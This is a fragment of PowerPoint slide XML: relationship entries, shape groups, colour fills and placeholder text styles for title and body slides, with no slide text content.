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slide" Target="slides/slide80.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide79.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide38.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide82.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide37.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide81.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide40.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide39.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide83.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69" name="Shape 4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Shape 5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01" name="Shape 5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Shape 5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16" name="Shape 5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Shape 5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27" name="Shape 5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Shape 5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37" name="Shape 5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Shape 5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5" name="Shape 5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Shape 5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53" name="Shape 5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Shape 5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60" name="Shape 5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Shape 5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71" name="Shape 5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Shape 5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77" name="Shape 5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Shape 5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92" name="Shape 5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6" name="Shape 596"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Shape 5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98" name="Shape 5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Shape 6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13" name="Shape 6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Shape 6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33" name="Shape 6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Shape 6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52" name="Shape 6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Shape 6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58" name="Shape 6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Shape 6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65" name="Shape 6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9" name="Shape 669"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="670" name="Shape 6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71" name="Shape 6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Shape 6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92" name="Shape 6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Shape 7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18" name="Shape 7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Shape 7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24" name="Shape 7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8" name="Shape 728"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="729" name="Shape 7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30" name="Shape 7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4" name="Shape 734"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="735" name="Shape 7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36" name="Shape 7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0" name="Shape 740"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="741" name="Shape 7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42" name="Shape 7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6" name="Shape 746"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="747" name="Shape 7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48" name="Shape 7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2" name="Shape 752"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="Shape 7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54" name="Shape 7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Shape 7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60" name="Shape 7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4" name="Shape 764"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="765" name="Shape 7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66" name="Shape 7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Shape 7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73" name="Shape 7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8" name="Shape 778"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="779" name="Shape 7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80" name="Shape 7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4" name="Shape 784"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="785" name="Shape 7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86" name="Shape 7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0" name="Shape 790"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="791" name="Shape 7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92" name="Shape 7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6" name="Shape 796"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="797" name="Shape 7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98" name="Shape 7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2" name="Shape 802"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="803" name="Shape 8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04" name="Shape 8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8" name="Shape 808"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="809" name="Shape 8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10" name="Shape 8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4" name="Shape 814"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="815" name="Shape 8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16" name="Shape 8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60" name="Shape 60"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="61" name="Shape 61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-11" y="1334227"/>
            <a:ext cx="7314320" cy="4116300"/>
            <a:chOff x="-11" y="1378677"/>
            <a:chExt cx="7314320" cy="4116300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Shape 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="-11" y="1378677"/>
              <a:ext cx="187800" cy="4116300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:t/>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Shape 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="187809" y="1378677"/>
              <a:ext cx="7126500" cy="4116300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F243E"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:t/>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Shape 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2266576"/>
            <a:ext cx="6400800" cy="1333800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0"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1pPr>
            <a:lvl2pPr lvl="1"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2pPr>
            <a:lvl3pPr lvl="2"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3pPr>
            <a:lvl4pPr lvl="3"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4pPr>
            <a:lvl5pPr lvl="4"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5pPr>
            <a:lvl6pPr lvl="5"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6pPr>
            <a:lvl7pPr lvl="6"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7pPr>
            <a:lvl8pPr lvl="7"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8pPr>
            <a:lvl9pPr lvl="8"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9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Shape 65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3600451"/>
            <a:ext cx="6400800" cy="900600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="24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66" name="Shape 66"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="67" name="Shape 67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-13" y="-12188"/>
            <a:ext cx="8005728" cy="1612601"/>
            <a:chOff x="-13" y="-12188"/>
            <a:chExt cx="8005728" cy="1161900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="Shape 68"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="-13" y="-12188"/>
              <a:ext cx="187800" cy="1161900"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:t/>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="Shape 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="187715" y="-12188"/>
              <a:ext cx="7818000" cy="1161900"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F243E"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:t/>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Shape 70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="134801"/>
            <a:ext cx="7315500" cy="1351800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Shape 71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1704688"/>
            <a:ext cx="8229600" cy="4840200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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72" name="Shape 72"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Shape 73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
